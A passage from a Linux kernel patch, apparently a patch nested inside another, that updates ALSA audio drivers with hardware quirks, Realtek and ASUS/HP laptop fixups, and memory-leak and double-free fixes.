+ 		timeri->ticks = timeri->cticks = ticks;
+ 	else if (!timeri->cticks)
+diff --git a/sound/hda/intel-dsp-config.c b/sound/hda/intel-dsp-config.c
+index bc03b5692983c..f1de386604a10 100644
+--- a/sound/hda/intel-dsp-config.c
++++ b/sound/hda/intel-dsp-config.c
+@@ -511,9 +511,32 @@ static const struct config_entry *snd_intel_dsp_find_config
+ 		if (table->codec_hid) {
+ 			int i;
+ 
+-			for (i = 0; i < table->codec_hid->num_codecs; i++)
+-				if (acpi_dev_present(table->codec_hid->codecs[i], NULL, -1))
++			for (i = 0; i < table->codec_hid->num_codecs; i++) {
++				struct nhlt_acpi_table *nhlt;
++				bool ssp_found = false;
++
++				if (!acpi_dev_present(table->codec_hid->codecs[i], NULL, -1))
++					continue;
++
++				nhlt = intel_nhlt_init(&pci->dev);
++				if (!nhlt) {
++					dev_warn(&pci->dev, "%s: NHLT table not found, skipped HID %s\n",
++						 __func__, table->codec_hid->codecs[i]);
++					continue;
++				}
++
++				if (intel_nhlt_has_endpoint_type(nhlt, NHLT_LINK_SSP) &&
++				    intel_nhlt_ssp_endpoint_mask(nhlt, NHLT_DEVICE_I2S))
++					ssp_found = true;
++
++				intel_nhlt_free(nhlt);
++
++				if (ssp_found)
+ 					break;
++
++				dev_warn(&pci->dev, "%s: no valid SSP found for HID %s, skipped\n",
++					 __func__, table->codec_hid->codecs[i]);
++			}
+ 			if (i == table->codec_hid->num_codecs)
+ 				continue;
+ 		}
+diff --git a/sound/pci/hda/hda_cs_dsp_ctl.c b/sound/pci/hda/hda_cs_dsp_ctl.c
+index 1622a22f96f6a..4a84ebe83157e 100644
+--- a/sound/pci/hda/hda_cs_dsp_ctl.c
++++ b/sound/pci/hda/hda_cs_dsp_ctl.c
+@@ -8,6 +8,7 @@
+ 
+ #include <linux/module.h>
+ #include <sound/soc.h>
++#include <linux/cleanup.h>
+ #include <linux/firmware/cirrus/cs_dsp.h>
+ #include <linux/firmware/cirrus/wmfw.h>
+ #include "hda_cs_dsp_ctl.h"
+@@ -97,11 +98,23 @@ static unsigned int wmfw_convert_flags(unsigned int in)
+ 	return out;
+ }
+ 
+-static void hda_cs_dsp_add_kcontrol(struct hda_cs_dsp_coeff_ctl *ctl, const char *name)
++static void hda_cs_dsp_free_kcontrol(struct snd_kcontrol *kctl)
+ {
++	struct hda_cs_dsp_coeff_ctl *ctl = (struct hda_cs_dsp_coeff_ctl *)snd_kcontrol_chip(kctl);
+ 	struct cs_dsp_coeff_ctl *cs_ctl = ctl->cs_ctl;
++
++	/* NULL priv to prevent a double-free in hda_cs_dsp_control_remove() */
++	cs_ctl->priv = NULL;
++	kfree(ctl);
++}
++
++static void hda_cs_dsp_add_kcontrol(struct cs_dsp_coeff_ctl *cs_ctl,
++				    const struct hda_cs_dsp_ctl_info *info,
++				    const char *name)
++{
+ 	struct snd_kcontrol_new kcontrol = {0};
+ 	struct snd_kcontrol *kctl;
++	struct hda_cs_dsp_coeff_ctl *ctl __free(kfree) = NULL;
+ 	int ret = 0;
+ 
+ 	if (cs_ctl->len > ADSP_MAX_STD_CTRL_SIZE) {
+@@ -110,6 +123,13 @@ static void hda_cs_dsp_add_kcontrol(struct hda_cs_dsp_coeff_ctl *ctl, const char
+ 		return;
+ 	}
+ 
++	ctl = kzalloc(sizeof(*ctl), GFP_KERNEL);
++	if (!ctl)
++		return;
++
++	ctl->cs_ctl = cs_ctl;
++	ctl->card = info->card;
++
+ 	kcontrol.name = name;
+ 	kcontrol.info = hda_cs_dsp_coeff_info;
+ 	kcontrol.iface = SNDRV_CTL_ELEM_IFACE_MIXER;
+@@ -117,20 +137,22 @@ static void hda_cs_dsp_add_kcontrol(struct hda_cs_dsp_coeff_ctl *ctl, const char
+ 	kcontrol.get = hda_cs_dsp_coeff_get;
+ 	kcontrol.put = hda_cs_dsp_coeff_put;
+ 
+-	/* Save ctl inside private_data, ctl is owned by cs_dsp,
+-	 * and will be freed when cs_dsp removes the control */
+ 	kctl = snd_ctl_new1(&kcontrol, (void *)ctl);
+ 	if (!kctl)
+ 		return;
+ 
+-	ret = snd_ctl_add(ctl->card, kctl);
++	kctl->private_free = hda_cs_dsp_free_kcontrol;
++	ctl->kctl = kctl;
++
++	/* snd_ctl_add() calls our private_free on error, which will kfree(ctl) */
++	cs_ctl->priv = no_free_ptr(ctl);
++	ret = snd_ctl_add(info->card, kctl);
+ 	if (ret) {
+ 		dev_err(cs_ctl->dsp->dev, "Failed to add KControl %s = %d\n", kcontrol.name, ret);
+ 		return;
+ 	}
+ 
+ 	dev_dbg(cs_ctl->dsp->dev, "Added KControl: %s\n", kcontrol.name);
+-	ctl->kctl = kctl;
+ }
+ 
+ static void hda_cs_dsp_control_add(struct cs_dsp_coeff_ctl *cs_ctl,
+@@ -138,7 +160,6 @@ static void hda_cs_dsp_control_add(struct cs_dsp_coeff_ctl *cs_ctl,
+ {
+ 	struct cs_dsp *cs_dsp = cs_ctl->dsp;
+ 	char name[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
+-	struct hda_cs_dsp_coeff_ctl *ctl;
+ 	const char *region_name;
+ 	int ret;
+ 
+@@ -163,15 +184,7 @@ static void hda_cs_dsp_control_add(struct cs_dsp_coeff_ctl *cs_ctl,
+ 			 " %.*s", cs_ctl->subname_len - skip, cs_ctl->subname + skip);
+ 	}
+ 
+-	ctl = kzalloc(sizeof(*ctl), GFP_KERNEL);
+-	if (!ctl)
+-		return;
+-
+-	ctl->cs_ctl = cs_ctl;
+-	ctl->card = info->card;
+-	cs_ctl->priv = ctl;
+-
+-	hda_cs_dsp_add_kcontrol(ctl, name);
++	hda_cs_dsp_add_kcontrol(cs_ctl, info, name);
+ }
+ 
+ void hda_cs_dsp_add_controls(struct cs_dsp *dsp, const struct hda_cs_dsp_ctl_info *info)
+@@ -203,7 +216,9 @@ void hda_cs_dsp_control_remove(struct cs_dsp_coeff_ctl *cs_ctl)
+ {
+ 	struct hda_cs_dsp_coeff_ctl *ctl = cs_ctl->priv;
+ 
+-	kfree(ctl);
++	/* ctl and kctl may already have been removed by ALSA private_free */
++	if (ctl && ctl->kctl)
++		snd_ctl_remove(ctl->card, ctl->kctl);
+ }
+ EXPORT_SYMBOL_NS_GPL(hda_cs_dsp_control_remove, SND_HDA_CS_DSP_CONTROLS);
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index f0b939862a2a6..3a7104f72cabd 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -7207,6 +7207,7 @@ enum {
+ 	ALC285_FIXUP_SPEAKER2_TO_DAC1,
+ 	ALC285_FIXUP_ASUS_SPEAKER2_TO_DAC1,
+ 	ALC285_FIXUP_ASUS_HEADSET_MIC,
++	ALC285_FIXUP_ASUS_SPI_REAR_SPEAKERS,
+ 	ALC285_FIXUP_ASUS_I2C_SPEAKER2_TO_DAC1,
+ 	ALC285_FIXUP_ASUS_I2C_HEADSET_MIC,
+ 	ALC280_FIXUP_HP_HEADSET_MIC,
+@@ -8214,6 +8215,15 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC285_FIXUP_ASUS_SPEAKER2_TO_DAC1
+ 	},
++	[ALC285_FIXUP_ASUS_SPI_REAR_SPEAKERS] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x14, 0x90170120 },
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC285_FIXUP_ASUS_HEADSET_MIC
++	},
+ 	[ALC285_FIXUP_ASUS_I2C_SPEAKER2_TO_DAC1] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc285_fixup_speaker2_to_dac1,
+@@ -9793,8 +9803,11 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c70, "HP EliteBook 835 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c71, "HP EliteBook 845 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c89, "HP ProBook 460 G11", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c8a, "HP EliteBook 630", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c8c, "HP EliteBook 660", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c8d, "HP ProBook 440 G11", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c8e, "HP ProBook 460 G11", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c90, "HP EliteBook 640", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c91, "HP EliteBook 660", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+@@ -9857,6 +9870,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1c23, "Asus X55U", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x1043, 0x1c62, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x1c92, "ASUS ROG Strix G15", ALC285_FIXUP_ASUS_G533Z_PINS),
++	SND_PCI_QUIRK(0x1043, 0x1caf, "ASUS G634JYR/JZR", ALC285_FIXUP_ASUS_SPI_REAR_SPEAKERS),
+ 	SND_PCI_QUIRK(0x1043, 0x1ccd, "ASUS X555UB", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1d1f, "ASUS ROG Strix G17 2023 (G713PV)", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1d42, "ASUS Zephyrus G14 2022", ALC289_FIXUP_ASUS_GA401),
+@@ -9879,7 +9893,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x3030, "ASUS ZN270IE", ALC256_FIXUP_ASUS_AIO_GPIO2),
+ 	SND_PCI_QUIRK(0x1043, 0x3a20, "ASUS G614JZR", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x3a30, "ASUS G814JVR/JIR", ALC245_FIXUP_CS35L41_SPI_2),
+-	SND_PCI_QUIRK(0x1043, 0x3a40, "ASUS G814JZR", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x3a40, "ASUS G814JZR", ALC285_FIXUP_ASUS_SPI_REAR_SPEAKERS),
+ 	SND_PCI_QUIRK(0x1043, 0x3a50, "ASUS G834JYR/JZR", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x3a60, "ASUS G634JYR/JZR", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x831a, "ASUS P901", ALC269_FIXUP_STEREO_DMIC),
+diff --git a/sound/soc/codecs/da7219-aad.c b/sound/soc/codecs/da7219-aad.c
+index c8410769188a0..d613f1074524a 100644
+--- a/sound/soc/codecs/da7219-aad.c
++++ b/sound/soc/codecs/da7219-aad.c
+@@ -638,8 +638,10 @@ static struct da7219_aad_pdata *da7219_aad_fw_to_pdata(struct device *dev)
+ 		return NULL;
+ 
+ 	aad_pdata = devm_kzalloc(dev, sizeof(*aad_pdata), GFP_KERNEL);
+-	if (!aad_pdata)
++	if (!aad_pdata) {
++		fwnode_handle_put(aad_np);
+ 		return NULL;
++	}
+ 
+ 	aad_pdata->irq = i2c->irq;
+ 
+@@ -714,6 +716,8 @@ static struct da7219_aad_pdata *da7219_aad_fw_to_pdata(struct device *dev)
+ 	else
+ 		aad_pdata->adc_1bit_rpt = DA7219_AAD_ADC_1BIT_RPT_1;
+ 
++	fwnode_handle_put(aad_np);
++
+ 	return aad_pdata;
+ }
+ 
+diff --git a/sound/soc/codecs/rt5645.c b/sound/soc/codecs/rt5645.c
+index aac9140749968..0bb70066111b7 100644
+--- a/sound/soc/codecs/rt5645.c
++++ b/sound/soc/codecs/rt5645.c
+@@ -441,6 +441,7 @@ struct rt5645_priv {
+ 	struct regmap *regmap;
+ 	struct i2c_client *i2c;
+ 	struct gpio_desc *gpiod_hp_det;
++	struct gpio_desc *gpiod_cbj_sleeve;
+ 	struct snd_soc_jack *hp_jack;
+ 	struct snd_soc_jack *mic_jack;
+ 	struct snd_soc_jack *btn_jack;
+@@ -3179,6 +3180,9 @@ static int rt5645_jack_detect(struct snd_soc_component *component, int jack_inse
+ 		regmap_update_bits(rt5645->regmap, RT5645_IN1_CTRL2,
+ 			RT5645_CBJ_MN_JD, 0);
+ 
++		if (rt5645->gpiod_cbj_sleeve)
++			gpiod_set_value(rt5645->gpiod_cbj_sleeve, 1);
++
+ 		msleep(600);
+ 		regmap_read(rt5645->regmap, RT5645_IN1_CTRL3, &val);
+ 		val &= 0x7;
+@@ -3195,6 +3199,8 @@ static int rt5645_jack_detect(struct snd_soc_component *component, int jack_inse
+ 			snd_soc_dapm_disable_pin(dapm, "Mic Det Power");
+ 			snd_soc_dapm_sync(dapm);
+ 			rt5645->jack_type = SND_JACK_HEADPHONE;
++			if (rt5645->gpiod_cbj_sleeve)
++				gpiod_set_value(rt5645->gpiod_cbj_sleeve, 0);
+ 		}
+ 		if (rt5645->pdata.level_trigger_irq)
+ 			regmap_update_bits(rt5645->regmap, RT5645_IRQ_CTRL2,
+@@ -3220,6 +3226,9 @@ static int rt5645_jack_detect(struct snd_soc_component *component, int jack_inse
+ 		if (rt5645->pdata.level_trigger_irq)
+ 			regmap_update_bits(rt5645->regmap, RT5645_IRQ_CTRL2,
+ 				RT5645_JD_1_1_MASK, RT5645_JD_1_1_INV);
++
++		if (rt5645->gpiod_cbj_sleeve)
++			gpiod_set_value(rt5645->gpiod_cbj_sleeve, 0);
+ 	}
+ 
+ 	return rt5645->jack_type;
+@@ -3931,6 +3940,16 @@ static int rt5645_i2c_probe(struct i2c_client *i2c)
+ 			return ret;
+ 	}
+ 
++	rt5645->gpiod_cbj_sleeve = devm_gpiod_get_optional(&i2c->dev, "cbj-sleeve",
++							   GPIOD_OUT_LOW);
++
++	if (IS_ERR(rt5645->gpiod_cbj_sleeve)) {
++		ret = PTR_ERR(rt5645->gpiod_cbj_sleeve);
++		dev_info(&i2c->dev, "failed to initialize gpiod, ret=%d\n", ret);
++		if (ret != -ENOENT)
++			return ret;
++	}
++
+ 	for (i = 0; i < ARRAY_SIZE(rt5645->supplies); i++)
+ 		rt5645->supplies[i].supply = rt5645_supply_names[i];
+ 
+@@ -4174,6 +4193,9 @@ static void rt5645_i2c_remove(struct i2c_client *i2c)
+ 	cancel_delayed_work_sync(&rt5645->jack_detect_work);
+ 	cancel_delayed_work_sync(&rt5645->rcclock_work);
+ 
++	if (rt5645->gpiod_cbj_sleeve)
++		gpiod_set_value(rt5645->gpiod_cbj_sleeve, 0);
++
+ 	regulator_bulk_disable(ARRAY_SIZE(rt5645->supplies), rt5645->supplies);
+ }
+ 
+@@ -4189,6 +4211,9 @@ static void rt5645_i2c_shutdown(struct i2c_client *i2c)
+ 		0);
+ 	msleep(20);
+ 	regmap_write(rt5645->regmap, RT5645_RESET, 0);
++
++	if (rt5645->gpiod_cbj_sleeve)
++		gpiod_set_value(rt5645->gpiod_cbj_sleeve, 0);
+ }
+ 
+ static struct i2c_driver rt5645_i2c_driver = {
+diff --git a/sound/soc/codecs/rt715-sdca.c b/sound/soc/codecs/rt715-sdca.c
+index ce8bbc76199a8..3377846a87539 100644
+--- a/sound/soc/codecs/rt715-sdca.c
++++ b/sound/soc/codecs/rt715-sdca.c
+@@ -315,7 +315,7 @@ static int rt715_sdca_set_amp_gain_8ch_get(struct snd_kcontrol *kcontrol,
+ 	return 0;
+ }
+ 
+-static const DECLARE_TLV_DB_SCALE(in_vol_tlv, -17625, 375, 0);
++static const DECLARE_TLV_DB_SCALE(in_vol_tlv, -1725, 75, 0);
+ static const DECLARE_TLV_DB_SCALE(mic_vol_tlv, 0, 1000, 0);
+ 
+ static int rt715_sdca_get_volsw(struct snd_kcontrol *kcontrol,
+@@ -476,7 +476,7 @@ static const struct snd_kcontrol_new rt715_sdca_snd_controls[] = {
+ 			RT715_SDCA_FU_VOL_CTRL, CH_01),
+ 		SDW_SDCA_CTL(FUN_MIC_ARRAY, RT715_SDCA_FU_ADC7_27_VOL,
+ 			RT715_SDCA_FU_VOL_CTRL, CH_02),
+-			0x2f, 0x7f, 0,
++			0x2f, 0x3f, 0,
+ 		rt715_sdca_set_amp_gain_get, rt715_sdca_set_amp_gain_put,
+ 		in_vol_tlv),
+ 	RT715_SDCA_EXT_TLV("FU02 Capture Volume",
+@@ -484,13 +484,13 @@ static const struct snd_kcontrol_new rt715_sdca_snd_controls[] = {
+ 			RT715_SDCA_FU_VOL_CTRL, CH_01),
+ 		rt715_sdca_set_amp_gain_4ch_get,
+ 		rt715_sdca_set_amp_gain_4ch_put,
+-		in_vol_tlv, 4, 0x7f),
++		in_vol_tlv, 4, 0x3f),
+ 	RT715_SDCA_EXT_TLV("FU06 Capture Volume",
+ 		SDW_SDCA_CTL(FUN_MIC_ARRAY, RT715_SDCA_FU_ADC10_11_VOL,
+ 			RT715_SDCA_FU_VOL_CTRL, CH_01),
+ 		rt715_sdca_set_amp_gain_4ch_get,
+ 		rt715_sdca_set_amp_gain_4ch_put,
+-		in_vol_tlv, 4, 0x7f),
++		in_vol_tlv, 4, 0x3f),
+ 	/* MIC Boost Control */
+ 	RT715_SDCA_BOOST_EXT_TLV("FU0E Boost",
+ 		SDW_SDCA_CTL(FUN_MIC_ARRAY, RT715_SDCA_FU_DMIC_GAIN_EN,
+diff --git a/sound/soc/codecs/rt715-sdw.c b/sound/soc/codecs/rt715-sdw.c
+index 4e61e16470eda..4e35b67b01ce8 100644
+--- a/sound/soc/codecs/rt715-sdw.c
++++ b/sound/soc/codecs/rt715-sdw.c
+@@ -111,6 +111,7 @@ static bool rt715_readable_register(struct device *dev, unsigned int reg)
+ 	case 0x839d:
+ 	case 0x83a7:
+ 	case 0x83a9:
++	case 0x752001:
+ 	case 0x752039:
+ 		return true;
+ 	default:
+diff --git a/sound/soc/codecs/tas2552.c b/sound/soc/codecs/tas2552.c
+index 59a4ea5f6e305..7923f9a031ed0 100644
+--- a/sound/soc/codecs/tas2552.c
++++ b/sound/soc/codecs/tas2552.c
+@@ -2,7 +2,8 @@
+ /*
+  * tas2552.c - ALSA SoC Texas Instruments TAS2552 Mono Audio Amplifier
+  *
+- * Copyright (C) 2014 Texas Instruments Incorporated -  https://www.ti.com
++ * Copyright (C) 2014 - 2024 Texas Instruments Incorporated -
++ *	https://www.ti.com
+  *
+  * Author: Dan Murphy <dmurphy@ti.com>
+  */
+@@ -119,12 +120,14 @@ static const struct snd_soc_dapm_widget tas2552_dapm_widgets[] =
+ 			 &tas2552_input_mux_control),
+ 
+ 	SND_SOC_DAPM_AIF_IN("DAC IN", "DAC Playback", 0, SND_SOC_NOPM, 0, 0),
++	SND_SOC_DAPM_AIF_OUT("ASI OUT", "DAC Capture", 0, SND_SOC_NOPM, 0, 0),
+ 	SND_SOC_DAPM_DAC("DAC", NULL, SND_SOC_NOPM, 0, 0),
+ 	SND_SOC_DAPM_OUT_DRV("ClassD", TAS2552_CFG_2, 7, 0, NULL, 0),
+ 	SND_SOC_DAPM_SUPPLY("PLL", TAS2552_CFG_2, 3, 0, NULL, 0),
+ 	SND_SOC_DAPM_POST("Post Event", tas2552_post_event),
+ 
+-	SND_SOC_DAPM_OUTPUT("OUT")
++	SND_SOC_DAPM_OUTPUT("OUT"),
++	SND_SOC_DAPM_INPUT("DMIC")
+ };
+ 
+ static const struct snd_soc_dapm_route tas2552_audio_map[] = {
+@@ -134,6 +137,7 @@ static const struct snd_soc_dapm_route tas2552_audio_map[] = {
+ 	{"ClassD", NULL, "Input selection"},
+ 	{"OUT", NULL, "ClassD"},
+ 	{"ClassD", NULL, "PLL"},
++	{"ASI OUT", NULL, "DMIC"}
+ };
+ 
+ #ifdef CONFIG_PM
+@@ -538,6 +542,13 @@ static struct snd_soc_dai_driver tas2552_dai[] = {
+ 			.rates = SNDRV_PCM_RATE_8000_192000,
+ 			.formats = TAS2552_FORMATS,
+ 		},
++		.capture = {
++			.stream_name = "Capture",
++			.channels_min = 2,
++			.channels_max = 2,
++			.rates = SNDRV_PCM_RATE_8000_192000,
++			.formats = TAS2552_FORMATS,
++		},
+ 		.ops = &tas2552_speaker_dai_ops,
+ 	},
+ };
+diff --git a/sound/soc/intel/avs/boards/ssm4567.c b/sound/soc/intel/avs/boards/ssm4567.c
+index 51a8867326b47..c1c936b73475d 100644
+--- a/sound/soc/intel/avs/boards/ssm4567.c
++++ b/sound/soc/intel/avs/boards/ssm4567.c
+@@ -217,7 +217,6 @@ static int avs_ssm4567_probe(struct platform_device *pdev)
+ 	card->dapm_routes = routes;
+ 	card->num_dapm_routes = num_routes;
+ 	card->fully_routed = true;
+-	card->disable_route_checks = true;
+ 
+ 	ret = snd_soc_fixup_dai_links_platform_name(card, pname);
+ 	if (ret)
+diff --git a/sound/soc/intel/avs/cldma.c b/sound/soc/intel/avs/cldma.c
+index d7a9390b5e483..585579840b646 100644
+--- a/sound/soc/intel/avs/cldma.c
++++ b/sound/soc/intel/avs/cldma.c
+@@ -35,7 +35,7 @@ struct hda_cldma {
+ 
+ 	unsigned int buffer_size;
+ 	unsigned int num_periods;
+-	unsigned int stream_tag;
++	unsigned char stream_tag;
+ 	void __iomem *sd_addr;
+ 
+ 	struct snd_dma_buffer dmab_data;
+diff --git a/sound/soc/intel/avs/path.c b/sound/soc/intel/avs/path.c
+index ce157a8d65520..989a7a4127cdd 100644
+--- a/sound/soc/intel/avs/path.c
++++ b/sound/soc/intel/avs/path.c
+@@ -308,6 +308,7 @@ static int avs_asrc_create(struct avs_dev *adev, struct avs_path_module *mod)
+ 	struct avs_tplg_module *t = mod->template;
+ 	struct avs_asrc_cfg cfg;
+ 
++	memset(&cfg, 0, sizeof(cfg));
+ 	cfg.base.cpc = t->cfg_base->cpc;
+ 	cfg.base.ibs = t->cfg_base->ibs;
+ 	cfg.base.obs = t->cfg_base->obs;
+diff --git a/sound/soc/intel/boards/bxt_da7219_max98357a.c b/sound/soc/intel/boards/bxt_da7219_max98357a.c
+index 7c6c95e99ade2..420c8b2588c17 100644
+--- a/sound/soc/intel/boards/bxt_da7219_max98357a.c
++++ b/sound/soc/intel/boards/bxt_da7219_max98357a.c
+@@ -762,6 +762,7 @@ static struct snd_soc_card broxton_audio_card = {
+ 	.dapm_routes = audio_map,
+ 	.num_dapm_routes = ARRAY_SIZE(audio_map),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = bxt_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/intel/boards/bxt_rt298.c b/sound/soc/intel/boards/bxt_rt298.c
+index 4bd93c3ba3777..ea45baaaaaed9 100644
+--- a/sound/soc/intel/boards/bxt_rt298.c
++++ b/sound/soc/intel/boards/bxt_rt298.c
+@@ -574,6 +574,7 @@ static struct snd_soc_card broxton_rt298 = {
+ 	.dapm_routes = broxton_rt298_map,
+ 	.num_dapm_routes = ARRAY_SIZE(broxton_rt298_map),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = bxt_card_late_probe,
+ 
+ };
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index 094445036c20f..d6ef8e850412b 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -636,28 +636,30 @@ static const struct dmi_system_id byt_rt5640_quirk_table[] = {
+ 					BYT_RT5640_USE_AMCR0F28),
+ 	},
+ 	{
++		/* Asus T100TAF, unlike other T100TA* models this one has a mono speaker */
+ 		.matches = {
+ 			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "T100TA"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "T100TAF"),
+ 		},
+ 		.driver_data = (void *)(BYT_RT5640_IN1_MAP |
+ 					BYT_RT5640_JD_SRC_JD2_IN4N |
+ 					BYT_RT5640_OVCD_TH_2000UA |
+ 					BYT_RT5640_OVCD_SF_0P75 |
++					BYT_RT5640_MONO_SPEAKER |
++					BYT_RT5640_DIFF_MIC |
++					BYT_RT5640_SSP0_AIF2 |
+ 					BYT_RT5640_MCLK_EN),
+ 	},
+ 	{
++		/* Asus T100TA and T100TAM, must come after T100TAF (mono spk) match */
+ 		.matches = {
+-			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+-			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "T100TAF"),
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "T100TA"),
+ 		},
+ 		.driver_data = (void *)(BYT_RT5640_IN1_MAP |
+ 					BYT_RT5640_JD_SRC_JD2_IN4N |
+ 					BYT_RT5640_OVCD_TH_2000UA |
+ 					BYT_RT5640_OVCD_SF_0P75 |
+-					BYT_RT5640_MONO_SPEAKER |
+-					BYT_RT5640_DIFF_MIC |
+-					BYT_RT5640_SSP0_AIF2 |
+ 					BYT_RT5640_MCLK_EN),
+ 	},
+ 	{
+diff --git a/sound/soc/intel/boards/glk_rt5682_max98357a.c b/sound/soc/intel/boards/glk_rt5682_max98357a.c
+index cf0f89db3e204..0f9bbb970b230 100644
+--- a/sound/soc/intel/boards/glk_rt5682_max98357a.c
++++ b/sound/soc/intel/boards/glk_rt5682_max98357a.c
+@@ -649,6 +649,8 @@ static int geminilake_audio_probe(struct platform_device *pdev)
+ 	card = &glk_audio_card_rt5682_m98357a;
+ 	card->dev = &pdev->dev;
+ 	snd_soc_card_set_drvdata(card, ctx);
++	if (!snd_soc_acpi_sof_parent(&pdev->dev))
++		card->disable_route_checks = true;
+ 
+ 	/* override platform name, if required */
+ 	mach = pdev->dev.platform_data;
+diff --git a/sound/soc/intel/boards/kbl_da7219_max98357a.c b/sound/soc/intel/boards/kbl_da7219_max98357a.c
+index 329457e3e3a22..c990baed8013b 100644
+--- a/sound/soc/intel/boards/kbl_da7219_max98357a.c
++++ b/sound/soc/intel/boards/kbl_da7219_max98357a.c
+@@ -633,6 +633,7 @@ static struct snd_soc_card kabylake_audio_card_da7219_m98357a = {
+ 	.dapm_routes = kabylake_map,
+ 	.num_dapm_routes = ARRAY_SIZE(kabylake_map),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/intel/boards/kbl_da7219_max98927.c b/sound/soc/intel/boards/kbl_da7219_max98927.c
+index 362579f25835e..7ab80ba264cb5 100644
+--- a/sound/soc/intel/boards/kbl_da7219_max98927.c
++++ b/sound/soc/intel/boards/kbl_da7219_max98927.c
+@@ -1030,6 +1030,7 @@ static struct snd_soc_card kbl_audio_card_da7219_m98927 = {
+ 	.codec_conf = max98927_codec_conf,
+ 	.num_configs = ARRAY_SIZE(max98927_codec_conf),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+@@ -1048,6 +1049,7 @@ static struct snd_soc_card kbl_audio_card_max98927 = {
+ 	.codec_conf = max98927_codec_conf,
+ 	.num_configs = ARRAY_SIZE(max98927_codec_conf),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+@@ -1065,6 +1067,7 @@ static struct snd_soc_card kbl_audio_card_da7219_m98373 = {
+ 	.codec_conf = max98373_codec_conf,
+ 	.num_configs = ARRAY_SIZE(max98373_codec_conf),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+@@ -1082,6 +1085,7 @@ static struct snd_soc_card kbl_audio_card_max98373 = {
+ 	.codec_conf = max98373_codec_conf,
+ 	.num_configs = ARRAY_SIZE(max98373_codec_conf),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/intel/boards/kbl_rt5660.c b/sound/soc/intel/boards/kbl_rt5660.c
+index 2c7a547f63c90..358d606228121 100644
+--- a/sound/soc/intel/boards/kbl_rt5660.c
++++ b/sound/soc/intel/boards/kbl_rt5660.c
+@@ -518,6 +518,7 @@ static struct snd_soc_card kabylake_audio_card_rt5660 = {
+ 	.dapm_routes = kabylake_rt5660_map,
+ 	.num_dapm_routes = ARRAY_SIZE(kabylake_rt5660_map),
+ 	.fully_routed = true,
++	.disable_route_checks = true,
+ 	.late_probe = kabylake_card_late_probe,
+ };
+ 
+diff --git a/sound/soc/intel/boards/kbl_rt5663_max98927.c b/sound/soc/intel/boards/kbl_rt5663_max98927.c
+index 2d4224c5b1520..d110ebd10bca2 100644
